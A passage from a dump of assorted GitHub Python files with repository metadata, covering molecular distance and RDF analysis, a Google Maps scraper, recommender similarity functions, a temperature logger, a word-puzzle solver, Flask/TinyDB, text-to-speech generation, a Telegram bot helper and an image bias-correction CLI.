argvs[ii]\n oname, ext = os.path.splitext(fname)\n if ext != '.pdb':\n oname = oname.split('.pdb')[0] + ext.split('.')[1] + '-moved'\n else:\n oname = oname + '-moved'\n\n obj = ampt.setfmo()\n obj.getmode = mode\n obj.assignmolname = assignmolname\n obj.refreshatmtype = refreshatmtype\n\n # print('infile:', fname)\n # print('oname:', oname)\n # print('centered-molid:', tgtmol - 1)\n\n # get pdbinfo\n obj.readpdb(fname)\n mollist = [i for i in range(obj.totalRes)]\n cellsize = obj.getpdbcell(fname)\n obj.cellsize = cellsize\n\n print('obj.totalRes:', obj.totalRes)\n\n if len(obj.cellsize) == 0:\n obj.cellsize = 0\n print('cellinfo: None')\n else:\n print('cellsize:', obj.cellsize)\n\n if calcmode == 'molpair':\n targets = []\n for i in range(obj.totalRes):\n # print(obj.resnames[i])\n if obj.resnames[i] == tgt1:\n targets.append(i)\n print('target1 id', targets)\n\n targets2 = []\n for i in range(obj.totalRes):\n # print(obj.resnames[i])\n if obj.resnames[i] == tgt2:\n targets2.append(i)\n print('target2 id', targets2)\n\n # centerOfMol: com of each molecules\n cocs = []\n for i in targets:\n cocs.append(obj.getCenter(obj.posRes[i]).tolist())\n # print('cocs', cocs)\n\n cocs2 = []\n for i in targets2:\n cocs2.append(obj.getCenter(obj.posRes[i]).tolist())\n # print('cocs', cocs)\n\n # getdist\n dists = []\n for i in range(len(targets)):\n for j in range(i, len(targets2)):\n if targets[i] == targets[j]:\n continue\n dists.append(obj.getdist_list(cocs[i], cocs2[j]))\n print('dists', dists)\n\n print(len(cocs), len(cocs2), len(dists))\n\n if calcmode == 'id':\n targets = []\n for i in range(obj.totalRes):\n # print(obj.resnames[i])\n if obj.resnames[i] == tgtmol:\n targets.append(i)\n print('tgtmol id', targets)\n print('coc', obj.posRes[centermolid])\n\n # centerOfMol: com of each molecules\n cocs = []\n for i in targets:\n cocs.append(obj.getCenter(obj.posRes[i]).tolist())\n # print('cocs', cocs)\n\n # getdist\n dists = []\n for i in range(len(targets)):\n dists.append(obj.getdist_list(cocs[i], cocs[centermolid]))\n print('dists', dists)\n\n print(len(dists))\n\n if calcmode == 'id-id':\n coc1 = obj.getCenter(obj.posRes[id1]).tolist()\n coc2 = obj.getCenter(obj.posRes[id2]).tolist()\n\n # getdist\n dist = obj.getdist_list(coc1, coc2)\n print('dist mol', str(id1) + '-' + str(id2) + ':', dist)\n\n sys.exit()\n# # if calcmode == 'particle':\n# # atoms = []\n# # for tgt in targets:\n# # atoms.append(obj.getnameAtom(uobj, tgt))\n# # # print(atoms)\n# #\n# # tgtobj.posRes = []\n# # for i in range(len(obj.posRes)):\n# # for j in range(len(atoms[i])):\n# # if atoms[i][j] == tgtpart:\n# # tgtobj.posRes.append(obj.posRes[i][j])\n# #\n# # # getdist\n# # dists = []\n# # for i in range(len(tgtobj.posRes)):\n# # dists.append(obj.getdist_list(tgtobj.posRes[i], centerpos))\n# # print('dists', dists)\n#\n#\n f = open(ofile, 'w')\n for dist in dists:\n print('{:8.3f}'.format(dist), file=f)\n f.close()\n\n # check distribution\n print('--- histogram ---')\n ddatas = []\n for i in range(0, math.ceil(100/step)):\n dcount = 0\n for dist in dists:\n if (dist > step * i - (step/2.0)) and (dist < (step * i + (step/2.0))):\n dcount += 1\n print(step*i, dcount)\n ddatas.append([step*i, dcount])\n\n f = open(o2file, 'w')\n for ddata in ddatas:\n print('{0[0]:8.3f} {0[1]:>10}'.format(ddata), file=f)\n f.close()\n\n # get areavol\n areas = []\n rdfs = []\n astart = 0\n for i in range(0, math.ceil(100/step)):\n rend = step * i + (step/2.0)\n aend = 4.0/3.0 * math.pi * rend ** 3\n areas.append(aend - astart)\n rdfs.append([ddatas[i][0], ddatas[i][1]/(aend-astart)])\n astart = copy.deepcopy(aend)\n\n print(areas)\n\n print('--- rdf ---')\n print(rdfs)\n f = open(o3file, 'w')\n for rdf in rdfs:\n print('{0[0]:8.3f} {0[1]:>10}'.format(rdf), file=f)\n f.close()\n\n print('out:', ofile, o2file, o3file)\n\n","repo_name":"kojioku/abmptools","sub_path":"tips/pdbtips/getrdfpdb.py","file_name":"getrdfpdb.py","file_ext":"py","file_size_in_byte":6456,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"74242874292","text":"import sys\nimport time\n\nimport selenium.common.exceptions\nfrom selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\n\n\ndef wait_for_site_load():\n script = \"\"\"\n function waitCss(selector, n=1, require=false, timeout=5000) {\n console.log(selector, n, require, timeout);\n var start = Date.now();\n while (Date.now() - start < timeout){\n if (document.querySelectorAll(selector).length >= n){\n return document.querySelectorAll(selector);\n }\n }\n if (require){\n throw new Error(`selector \"${selector}\" timed out in ${Date.now() - start} ms`);\n } else {\n return document.querySelectorAll(selector);\n }\n }\n\n var results = waitCss(\"div[role*=article]>a\", n=10, require=false);\n return Array.from(results).map((el) => el.getAttribute(\"href\"))\n \"\"\"\n return script\n\n\ndef element_remover(hits, str_to_remove):\n # remove duplicates\n sorted_hits = list(dict.fromkeys(hits)) # better to not collect duplicates\n\n # remove elements containing 'tøjcontainer'\n for element in sorted_hits:\n if element.accessible_name.find(str_to_remove) != -1:\n print(f'removed {element.accessible_name} with id {element.id}')\n sorted_hits.remove(element) # somehow two always escape\n\n return sorted_hits\n\n\ndef search_bar_unclicker(driver):\n mouse_tracker = driver.find_element(By.XPATH, '/html/body/div[3]/div[8]/div[9]/div/div/div[1]/div[2]/div/div['\n '1]/div/div/div[1]/div[1]/div[6]')\n ActionChains(driver) \\\n .move_to_element(mouse_tracker) \\\n .click(mouse_tracker) \\\n .perform()\n\n time.sleep(1)\n\n\ndef search(query, word_to_avoid):\n driver = webdriver.Firefox()\n url = f\"https://www.google.com/maps/search/{query.replace(' ', '+')}/\"\n\n try:\n driver.get(url)\n\n # pass the cookie page\n time.sleep(1)\n cookie = driver.find_element(By.XPATH, '/html/body/c-wiz/div/div/div/div[2]/div[1]/div[3]'\n '/div[1]/div[1]/form[1]/div/div/button')\n cookie.click()\n\n # unclick search bar\n search_bar_unclicker(driver)\n\n # lists the first 7 hits, a scroll is needed to load more\n hits = []\n sys.stdout.write('Loading elements')\n # TODO change looping method, still sometimes breaks off at the end\n while len(hits) < 200:\n found_elements = driver.find_elements(By.CLASS_NAME, 'hfpxzc')\n hits.extend(found_elements)\n if hits:\n action = ActionChains(driver)\n bob = hits[-1].location_once_scrolled_into_view # TODO look up\n action.scroll_to_element(hits[-1]).perform()\n time.sleep(2) # TODO change to wait for next element to load\n\n sys.stdout.write('.') # a loading bar while waiting for the while loop to finish\n sys.stdout.flush()\n\n sys.stdout.write('\\n') # add space after loading\n hits = element_remover(hits, word_to_avoid)\n\n # visualizer for collected data, TODO save as file instead, for data analysis\n for hit in hits:\n print(f'\\nGenbrug: {hit.accessible_name} med page id: {hit.id}')\n\n urls = driver.execute_script(wait_for_site_load()) # unused\n\n driver.quit()\n\n return urls or [url]\n\n finally:\n driver.minimize_window()\n","repo_name":"MagnusPC/openhours_webscraper","sub_path":"source/controller/place_finder.py","file_name":"place_finder.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33609441346","text":"from abc import abstractmethod\nimport numpy as np\nimport pandas as pd\nimport editdistance\nfrom typing import List\n\nfrom recommender.dataset import Dataset\n\nclass BaseRecommender:\n \"\"\"Base class for all recommender algorithms.\"\"\"\n\n def init_state(self, **kwargs):\n \"\"\"Initialize the recommender state with additional data if needed.\"\"\"\n pass\n\n @abstractmethod\n def fit(self, dataset: Dataset):\n \"\"\"Fit the recommender algorithm to the given data.\"\"\"\n\n @abstractmethod\n def predict(self, patient_id: str, condition_id: str, therapy_id: str = None):\n \"\"\"Recommend a list of k therapies with a predicted success rate.\"\"\"\n\n @staticmethod\n def _get_trials(p_trials, condition_ids: List[str]):\n \"\"\"Return the trials of the given conditions.\"\"\"\n return p_trials[p_trials.condition.isin(condition_ids)]\n\n @staticmethod\n def _get_utility_matrix(p_trials: pd.DataFrame, therapies: pd.DataFrame):\n \"\"\"Compute the utility matrix, using as value the 'successful' column. The result is a NxM utility matrix, where:\n - N is the number of conditions of each patient (i.e. the \"users\")\n - M is the number of available therapies (i.e. the \"items\")\"\"\"\n features = p_trials.pivot_table(index='condition', columns='therapy', values='successful', aggfunc='mean')\n features = features.reindex(columns=therapies.index)\n return features\n\n @staticmethod\n def _get_baseline_estimates(utility_matrix: pd.DataFrame, p_conditions: pd.DataFrame):\n \"\"\"Compute the baseline estimates on the given utility matrix.\"\"\"\n global_avg_rating = np.nanmean(utility_matrix)\n utility_matrix = utility_matrix.reindex(index=p_conditions.index.get_level_values('id')) # Re-index to include global baseline for conditions without therapies\n users_rating_deviation = (utility_matrix.mean(axis=1, skipna=True) - global_avg_rating).fillna(0).values # fillna for users with no ratings\n items_rating_deviation = (utility_matrix.mean(axis=0, skipna=True) - global_avg_rating).fillna(0).values\n global_baseline = global_avg_rating + (users_rating_deviation.reshape(-1,1) + items_rating_deviation.reshape(1,-1))\n global_baseline = pd.DataFrame(global_baseline, index=utility_matrix.index, columns=utility_matrix.columns)\n return global_baseline\n\n @staticmethod\n def _get_trials_sequences(p_trials: pd.DataFrame):\n \"\"\"Convert the given conditions in p_trials to a list of trials, ordered by start time.\"\"\"\n sequences = p_trials.sort_values('start').groupby(['condition'], observed=True)['therapy'].apply(list)\n return sequences\n\n @staticmethod\n def _build_patients_demographic_profiles(patients: pd.DataFrame):\n \"\"\"Build the patients profiles based on the available demographic data.\"\"\"\n patients = patients.copy().drop(columns=['name', 'email', 'birthdate'], errors='ignore')\n if 'age' in patients.columns: # Convert age to category\n patients['age'] = pd.cut(patients['age'], bins=[0, 2, 18, 30, 50, 70, np.inf], labels=['<2', '2-18', '18-30', '30-50', '50-70', '>70'])\n return patients\n\n @staticmethod\n def _build_patients_conditions_profiles(p_conditions: pd.DataFrame, conditions: pd.DataFrame):\n \"\"\"Build the patients profiles based on their medical conditions.\"\"\"\n profiles = pd.crosstab(p_conditions.index.get_level_values('patient'), p_conditions['kind']).astype(bool)\n profiles = profiles.reindex(columns=conditions.index)\n profiles.index.rename('id', inplace=True)\n return profiles\n\n @staticmethod\n def _jaccard_similarity(target_item: pd.DataFrame, other_items: pd.DataFrame):\n \"\"\"Compute the Jaccard similarity between the target item and all the other items.\"\"\"\n assert target_item.shape[0] == 1, 'target_item must contain 1 element'\n other_index = other_items.index\n target_item, other_items = target_item.fillna(0).values.astype(bool), other_items.fillna(0).values.astype(bool)\n intersection = (target_item & other_items).sum(axis=1)\n union = (target_item | other_items).sum(axis=1)\n similarities = intersection / union\n similarities = pd.Series(similarities, index=other_index)\n return similarities\n\n @staticmethod\n def _hamming_similarity(target_item: pd.DataFrame, other_items: pd.DataFrame):\n \"\"\"Compute the normalized hamming similarity between the target item and all the other items.\"\"\"\n assert target_item.shape[0] == 1, 'target_item must contain 1 element'\n intersection = (target_item.iloc[0] == other_items).sum(axis=1)\n similarities = intersection / target_item.shape[1]\n return similarities\n\n @staticmethod\n def _pearson_correlation(target_item: pd.DataFrame, other_items: pd.DataFrame):\n \"\"\"Compute the centered cosine similarity (pearson correlation) between the target item and all the other items.\"\"\"\n assert target_item.shape[0] == 1, 'target_item must contain 1 element'\n other_index = other_items.index\n target_item, other_items = target_item.values, other_items.values\n # Normalize using rows means (centered cosine similarity)\n target_item = target_item - np.nanmean(target_item, axis=1, keepdims=True)\n other_items = other_items - np.nanmean(other_items, axis=1, keepdims=True)\n # Compute cosine similarity\n target_item[np.isnan(target_item)], other_items[np.isnan(other_items)] = 0, 0 # Set missing ratings to 0\n dot_prods = (other_items @ target_item.T).ravel() # Compute dot product between target_item and all other_items\n target_norm = np.linalg.norm(target_item, ord=2, axis=1)\n other_norms = np.linalg.norm(other_items, ord=2, axis=1)\n with np.errstate(divide='ignore', invalid='ignore'):\n similarities = dot_prods / (target_norm * other_norms)\n similarities = pd.Series(similarities, index=other_index)\n similarities = similarities.fillna(-1) # If NaN, one of the vectors is zeros-only. Set similarity to -1.\n return similarities\n\n @staticmethod\n def _levenshtein_similarity(target_item: pd.DataFrame, other_items: pd.DataFrame):\n \"\"\"Compute the Levenshtein distance between the target item and all the other items.\"\"\"\n assert target_item.shape[0] == 1, 'target_item must contain 1 element'\n target_sequence = target_item.iloc[0]\n similarities = pd.Series(index=other_items.index)\n for condition_id, sequence in other_items.iteritems():\n distance = editdistance.eval(target_sequence, sequence)\n max_len = max(len(target_sequence), len(sequence))\n similarity = max_len - distance # Convert distance to similarity\n similarities.loc[condition_id] = similarity\n return similarities\n","repo_name":"materight/therapy-recommender-system","sub_path":"recommender/algorithms/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11297443562","text":"from time import sleep\nimport Adafruit_BBIO.ADC as ADC\n\n#initialize variables\ndayTimer = 0\nhourTimer = 0\navgTempHour = 0\navgTemp24Hours = 0\nhourTemperatureList = []\ndayTemperatureList = []\nlistTracker = 0\n\nsensor = 'P9_40'\nADC.setup()\n#initialize temps to first reading\nreading = ADC.read(sensor)\ncelsiusInitial = ((reading*1800) - 500) / 10\nsensor = 'P9_40'\nmaxTemp = celsiusInitial\nminTemp = celsiusInitial\nhourTemperatureList.append(celsiusInitial)\ndayTemperatureList.append(celsiusInitial)\n# add another while loop with another timer for every layer added, example: years, decades\nwhile dayTimer < 86400: #86400 seconds is 24 hours\n hourTimer = 0\n listTracker = 0\n avgTempHour = sum(hourTemperatureList)/len(hourTemperatureList)\n dayTemperatureList.append(avgTempHour)\n avgTemp24Hours = sum(dayTemperatureList)/len(dayTemperatureList)\n while hourTimer < 3600: # 3600 seconds is 1 hour\n reading = ADC.read(sensor)\n celsius = ((reading*1800) - 500) / 10\n hourTemperatureList.append(celsius)\n #print(celsius)\n #print(hourTemperatureList[listTracker])\n #print(minTemp)\n #print(maxTemp)\n if hourTemperatureList[listTracker] > maxTemp:\n maxTemp = hourTemperatureList[listTracker]\n #print(maxTemp)\n if hourTemperatureList[listTracker] < minTemp:\n minTemp = hourTemperatureList[listTracker]\n #print(minTemp)\n print('HourAvg=%f DayAvg=%f Min=%f Max=%f' % (avgTempHour, avgTemp24Hours,minTemp,maxTemp ))\n with open('/var/www/html/hourlyTempStatistics.html','w') as file:\n file.write(\"24 Hour Temp Stats\")\n file.write(\"

    CodyWanKenobi's Jedi Magic

    \")\n file.write(\"

    Current System Temperature Statistics (C): \\n\")\n file.write('HourAvg=%f DayAvg=%f Min=%f Max=%f' % (avgTempHour, avgTemp24Hours,minTemp,maxTemp ))\n file.write(\"

    \")\n listTracker += 1\n dayTimer += 120\n hourTimer += 120\n sleep(120) #take readings every two minutes\n","repo_name":"codyblack148/ThermostatSimulator","sub_path":"tempValues24Hours.py","file_name":"tempValues24Hours.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32742513612","text":"#!/usr/bin/env python3\n\n# ls -l /dev | grep -v total | awk '{print $4}' | sort | uniq -c | sort -rn\n\nimport os\n\ncounts = {}\nfor index, line in enumerate(os.popen('ls -l /dev')):\n if not index:\n continue\n group = line.split()[3]\n counts[group] = counts.get(group, 0) + 1\n\nfor group, count in sorted(counts.items(), key=lambda p: p[1], reverse=True):\n print('{:7} {}'.format(count, group))\n","repo_name":"nd-cse-20289-sp22/cse-20289-sp22-examples","sub_path":"lecture09/translate3.py","file_name":"translate3.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35274408776","text":"import argparse\n\n_end = \"_end_\"\ndebug = False\n\n\nclass Trie:\n\n def __init__(self, words):\n self._root = dict()\n for word in words:\n current_dict = self._root\n for letter in word:\n current_dict = current_dict.setdefault(letter, {})\n current_dict[_end] = _end\n\n @property\n def root(self):\n return self._root\n\n def is_a_word_node(self, node: dict):\n return node.get(_end) is not None\n\n def get_children(self, node):\n return node.items()\n\n\nclass Letterbox:\n\n def __init__(self, letterbox_string, all_words_from_dictionary):\n letterbox = list()\n edges = letterbox_string.split(\"-\")\n for edge in edges:\n letterbox.append([c for c in edge])\n self._flattened_letterbox = set()\n for edge in letterbox:\n self._flattened_letterbox = self._flattened_letterbox.union(edge)\n self._adjacency_matrix = []\n for c1 in self._flattened_letterbox:\n for c2 in self._flattened_letterbox:\n for edge in letterbox:\n if c1 in edge and c2 in edge:\n self._adjacency_matrix.append(f\"{c1}{c2}\")\n self._allowed_words = [w.lower() for w in all_words_from_dictionary if self._is_allowed(w)]\n self._trie = Trie(self._allowed_words)\n\n def _is_adjacent(self, c1, c2):\n if c1 is None: return False\n return (c1 + c2) in self._adjacency_matrix\n\n def _is_allowed(self, word):\n letter_set = set(word)\n if not letter_set.intersection(self._flattened_letterbox) == letter_set:\n return False\n c_prev = None\n for c_curr in word:\n if self._is_adjacent(c_prev, c_curr):\n return False\n c_prev = c_curr\n return True\n\n def _is_a_word_node(self, node):\n return self._trie.is_a_word_node(node)\n\n def _all_words_from_this_node_down(self, node, word_fragment):\n valid_word_list = []\n for ni in node.items():\n subnode = ni[1]\n if subnode == _end: continue # Ignore the _end child - it signifies that the PARENT is a word. Additional children, however, indicate longer words.\n word_to_evaluate = word_fragment + ni[0]\n if self._is_a_word_node(subnode):\n valid_word_list.append(word_to_evaluate)\n for w in self._all_words_from_this_node_down(subnode, word_to_evaluate):\n valid_word_list.append(w)\n return valid_word_list\n\n\n @property\n def all_possible_words(self):\n return self._all_words_from_this_node_down(self._trie.root, '')\n\n def all_subsequent_words(self, prev_word):\n first_letter = prev_word[-1]\n subnode = self._trie.root.get(first_letter)\n if subnode is None:\n return []\n return self._all_words_from_this_node_down(subnode, first_letter)\n\n def is_complete(self, words):\n letters_used = set()\n for word in words:\n for c in word:\n letters_used = letters_used.union(c)\n rc = letters_used.intersection(self._flattened_letterbox) == self._flattened_letterbox\n if rc:\n return True\n else:\n if (debug): print(f\"{words} is lacking {self._flattened_letterbox - letters_used}\")\n\n @property\n def solutions(self):\n solutions = []\n for first_word in self.all_possible_words:\n for subsequent_word in self.all_subsequent_words(first_word):\n if self.is_complete([first_word, subsequent_word]):\n solutions.append(f\"{first_word}-{subsequent_word}\")\n return solutions\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Solve Letterbox Puzzle\")\n parser.add_argument('--puzzle', help='Dash-separated list of strings representing the edges of the puzzle. For example asd-feg-jiy-uiu', required=True)\n parser.add_argument('--dictionary', help='Dictionary (list of words)', default=\"words.txt\")\n args = parser.parse_args()\n with open(args.dictionary, \"r\") as f:\n all_words_from_dictionary = f.read().lower().split()\n print(f\"Solutions for letterbox {args.puzzle}: \")\n solutions = Letterbox(letterbox_string=args.puzzle, all_words_from_dictionary=all_words_from_dictionary).solutions\n for solution in solutions:\n print(f\" * {solution}\")\n\n\n\n\n\n\n\n","repo_name":"adrian2465/letterbox","sub_path":"trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10072538534","text":"from flask import Flask\n\nfrom flask_tinydb import TinyDB\nfrom flask_tinydb.storages import YAMLStorage\n\napp = Flask(__name__)\napp.config[\"TINYDB_DATABASE_STORAGE\"] = YAMLStorage\ndb = TinyDB(app)\n\n\n@app.route(\"/\")\ndef index():\n all_pets = db.get_table().all()\n return \", \".join([value[\"name\"] for value in all_pets]) if all_pets else \"No pets\"\n\n\n@app.route(\"/add/\")\ndef add(pet):\n db.get_table().insert({\"name\": pet})\n return f\"Added {pet}\"\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"mmdbalkhi/Flask-tinydb","sub_path":"examples/use_yaml_db.py","file_name":"use_yaml_db.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"42696075825","text":"import json\n\n# Carrega texto\nwith open('estoque', 'r') as arquivo_json:\n texto = arquivo_json.read()\n\n# Converte para dicionário\ndicionario = json.loads(texto)\n\n# Calcula preço\npreco = 0\nfor produto in dicionario:\n qtde = dicionario['quantidade']\n preco = dicionario['valor']\n preco += qtde*preco\n\nprint(preco)","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_053/ch159_2020_04_29_11_00_36_995442.py","file_name":"ch159_2020_04_29_11_00_36_995442.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12708711628","text":"import argparse\nfrom pathlib import Path\nfrom typing import Tuple, Dict, Any\nimport time\n\nimport torch\nimport numpy as np\n\nfrom models.fatchord_version import WaveRNN\nfrom models.tacotron import Tacotron\nfrom utils.display import simple_table\nfrom utils.dsp import DSP\nfrom utils.files import read_config\nfrom utils.paths import Paths\nfrom utils.text.cleaners import Cleaner\nfrom utils.text.tokenizer import Tokenizer\n\n\ndef load_taco(checkpoint_path: str) -> Tuple[Tacotron, Dict[str, Any]]:\n print(f'Loading tts checkpoint {checkpoint_path}')\n checkpoint = torch.load(checkpoint_path, map_location=torch.device('cpu'))\n config = checkpoint['config']\n tts_model = Tacotron.from_config(config)\n tts_model.load_state_dict(checkpoint['model'])\n print(f'Loaded taco with step {tts_model.get_step()}')\n return tts_model, config\n\n\ndef load_wavernn(checkpoint_path: str) -> Tuple[WaveRNN, Dict[str, Any]]:\n print(f'Loading voc checkpoint {checkpoint_path}')\n checkpoint = torch.load(checkpoint_path, map_location=torch.device('cpu'))\n config = checkpoint['config']\n voc_model = WaveRNN.from_config(config)\n voc_model.load_state_dict(checkpoint['model'])\n print(f'Loaded wavernn with step {voc_model.get_step()}')\n return voc_model, config\n\n\nif __name__ == '__main__':\n\n # Parse Arguments\n parser = argparse.ArgumentParser(description='TTS Generator')\n parser.add_argument('--input_text', '-i', default=None, type=str, help='[string] Type in something here and TTS will generate it!')\n parser.add_argument('--checkpoint', type=str, default=None, help='[string/path] path to .pt model file.')\n parser.add_argument('--config', metavar='FILE', default='config.yaml', help='The config containing all hyperparams. Only'\n 'used if no checkpoint is set.')\n parser.add_argument('--steps', type=int, default=1000, help='Max number of steps.')\n parser.add_argument('--cpu', action='store_true', help='Force CPU use.')\n parser.add_argument('--voc_checkpoint', type=str, default=None, help='[string/path] Load in different WaveRNN weights')\n\n\n # name of subcommand goes to args.vocoder\n subparsers = parser.add_subparsers(dest='vocoder')\n wr_parser = subparsers.add_parser('wavernn')\n wr_parser.add_argument('--overlap', '-o', default=550, type=int, help='[int] number of crossover samples')\n wr_parser.add_argument('--target', '-t', default=11_000, type=int, help='[int] number of samples in each batch index')\n\n gl_parser = subparsers.add_parser('griffinlim')\n mg_parser = subparsers.add_parser('melgan')\n\n args = parser.parse_args()\n \n print(args)\n\n assert args.vocoder in {'griffinlim', 'wavernn', 'melgan'}, \\\n 'Please provide a valid vocoder! Choices: [\\'griffinlim\\', \\'wavernn\\', \\'melgan\\']'\n\n checkpoint_path = args.checkpoint\n if checkpoint_path is None:\n config = read_config(args.config)\n paths = Paths(config['data_path'], config['voc_model_id'], config['tts_model_id'])\n checkpoint_path = paths.taco_checkpoints / 'latest_weights.pyt'\n\n tts_model, config = load_taco(checkpoint_path)\n dsp = DSP.from_config(config)\n \n voc_checkpoint_path = args.voc_checkpoint\n if voc_checkpoint_path is None:\n config = read_config(args.config)\n paths = Paths(config['data_path'], config['voc_model_id'], config['tts_model_id'])\n voc_checkpoint_path = paths.voc_checkpoints / 'latest_weights.pyt' \n\n voc_model, voc_dsp = None, None\n if args.vocoder == 'wavernn':\n voc_model, voc_config = load_wavernn(voc_checkpoint_path)\n voc_dsp = DSP.from_config(voc_config)\n\n out_path = Path('model_outputs')\n out_path.mkdir(parents=True, exist_ok=True)\n \n if torch.cuda.is_available() and not args.cpu:\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n tts_model.to(device)\n cleaner = Cleaner.from_config(config)\n tokenizer = Tokenizer()\n\n print('Using device:', device)\n if args.input_text:\n texts = [args.input_text]\n else:\n with open('sentences.txt', 'r', encoding='utf-8') as f:\n texts = f.readlines()\n\n tts_k = tts_model.get_step() // 1000\n\n if args.vocoder == 'griffinlim':\n simple_table([('Forward Tacotron', str(tts_k) + 'k'),\n ('Vocoder Type', 'Griffin-Lim')])\n\n elif args.vocoder == 'melgan':\n simple_table([('Forward Tacotron', str(tts_k) + 'k'),\n ('Vocoder Type', 'MelGAN')])\n\n # simple amplification of pitch\n pitch_function = lambda x: x * args.amp\n \n concatenated = np.zeros([0], dtype=np.single)\n\n timestamp = int(time.time())\n for i, x in enumerate(texts, 1):\n print(f'\\n| Generating {i}/{len(texts)}')\n x = cleaner(x)\n x = tokenizer(x)\n x = torch.as_tensor(x, dtype=torch.long, device=device).unsqueeze(0)\n\n wav_name = f'{i}_taco_{tts_k}k_{args.vocoder}'\n\n _, m, _ = tts_model.generate(x=x, steps=args.steps)\n if args.vocoder == 'melgan':\n m = torch.tensor(m).unsqueeze(0)\n torch.save(m, out_path / f'{wav_name}.mel')\n if args.vocoder == 'wavernn':\n m = torch.tensor(m).unsqueeze(0)\n wav = voc_model.generate(mels=m,\n batched=True,\n target=args.target,\n overlap=args.overlap,\n mu_law=voc_dsp.mu_law)\n dsp.save_wav(wav, out_path / f'{timestamp}-{wav_name}.wav')\n elif args.vocoder == 'griffinlim':\n wav = dsp.griffinlim(m)\n dsp.save_wav(wav, out_path / f'{timestamp}-{wav_name}.wav') \n if args.vocoder != 'melgan':\n wav = np.append(wav, np.zeros(int(22050*0.25), dtype=np.single))\n concatenated = np.append(concatenated, wav)\n\n if len(texts) > 1:\n dsp.save_wav(concatenated, out_path / f'{timestamp}_taco_{tts_k}k_{args.vocoder}-full.wav')\n\n print('\\n\\nDone.\\n')\n","repo_name":"agheful/PajladaTTS","sub_path":"gen_tacotron.py","file_name":"gen_tacotron.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"2750764723","text":"#!/usr/bin/env python3\n\n# region * Imports\n\nfrom root.model.chat import Chat\nfrom telegram import User\nfrom root.constant.message import JOIN_MESSAGE\n# endregion\n\ndef create_chat(chat_id: int):\n try:\n Chat(chat_id=chat_id, admins=[], join_message=\"\").save()\n except Exception as e:\n print(f\"Unable to create chat: {e}\")\n\ndef retrieve_chat(chat_id: int):\n try:\n return Chat.objects().get(chat_id=chat_id)\n except Exception as e:\n print(f\"Unable to find the chat with id [{chat_id}]: {e}\")\n\n\ndef add_admin(chat_id: int, user_id: int):\n chat: Chat = retrieve_chat(chat_id)\n if chat:\n if not user_id in chat.admins:\n chat.admins.append(user_id)\n chat.save()\n\ndef get_welcome_message(chat_id: int, user: User):\n chat: Chat = retrieve_chat(chat_id)\n if chat:\n if chat.join_message:\n return chat.join_message\n return JOIN_MESSAGE(user)","repo_name":"nautilor/telegram-captcha-bot","sub_path":"root/helper/chat_helper.py","file_name":"chat_helper.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24648785121","text":"#!/usr/bin/env python3\n# PYTHON_ARGCOMPLETE_OK\n# coding: utf-8\n\nimport argparse\nimport argcomplete\nimport sys\nimport multiprocessing\nimport os\nfrom datetime import datetime\nfrom hippmapper.utils import endstatement\n\nfrom nipype.interfaces.ants import N4BiasFieldCorrection\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = \"3\"\n\n\ndef parsefn():\n parser = argparse.ArgumentParser(usage=\"%(prog)s -i [ in_img ] \\n\\n\"\n \"Bias field correct images using N4\")\n\n required = parser.add_argument_group('required arguments')\n required.add_argument('-i', '--in_img', type=str, required=True, metavar='',\n help=\"input image\")\n\n optional = parser.add_argument_group('optional arguments')\n\n optional.add_argument('-m', '--mask_img', type=str, metavar='', default=None,\n help=\"mask image before correction (default: %(default)s)\")\n optional.add_argument('-s', '--shrink', type=int, metavar='', default=3,\n help=\"shrink factor (default: %(default)s)\")\n\n optional.add_argument('-n', '--noise', type=float, metavar='', default=0.005,\n help=\"Noise parameter for histogram sharpening - deconvolution (default: %(default)s)\")\n optional.add_argument('-b', '--bspline', type=int, metavar='', default=300,\n help=\"Bspline distance (default: %(default)s)\")\n optional.add_argument('-k', '--fwhm', type=float, metavar='', default=0.3,\n help=\"FWHM for histogram sharpening - deconvolution (default: %(default)s)\")\n optional.add_argument('-it', '--iters', type=int, nargs='+', metavar='', default=[50, 50, 30, 20],\n help=\"Number of iterations for convergence (default: %(default)s)\")\n optional.add_argument('-t', '--thresh', type=int, metavar='', default=1e-6,\n help=\"Threshold for convergence (default: %(default)s)\")\n optional.add_argument('-o', '--out_img', type=str, metavar='', default=None,\n help=\"output image (default: %(default)s)\")\n\n # optional.add_argument(\"-h\", \"--help\", action=\"help\", help=\"Show this help message and exit\")\n\n return parser\n\n\ndef parse_inputs(parser, args):\n\n if isinstance(args, list):\n args = parser.parse_args(args)\n argcomplete.autocomplete(parser)\n\n in_img = args.in_img.strip()\n mask_img = args.mask_img\n shrink = args.shrink\n bspline = args.bspline\n iters = args.iters\n thresh = args.thresh\n out_img = args.out_img.strip() if args.out_img is not None else None\n\n return in_img, mask_img, shrink, bspline, iters, thresh, out_img\n\n\ndef main(args):\n parser = parsefn()\n [in_img, mask_img, 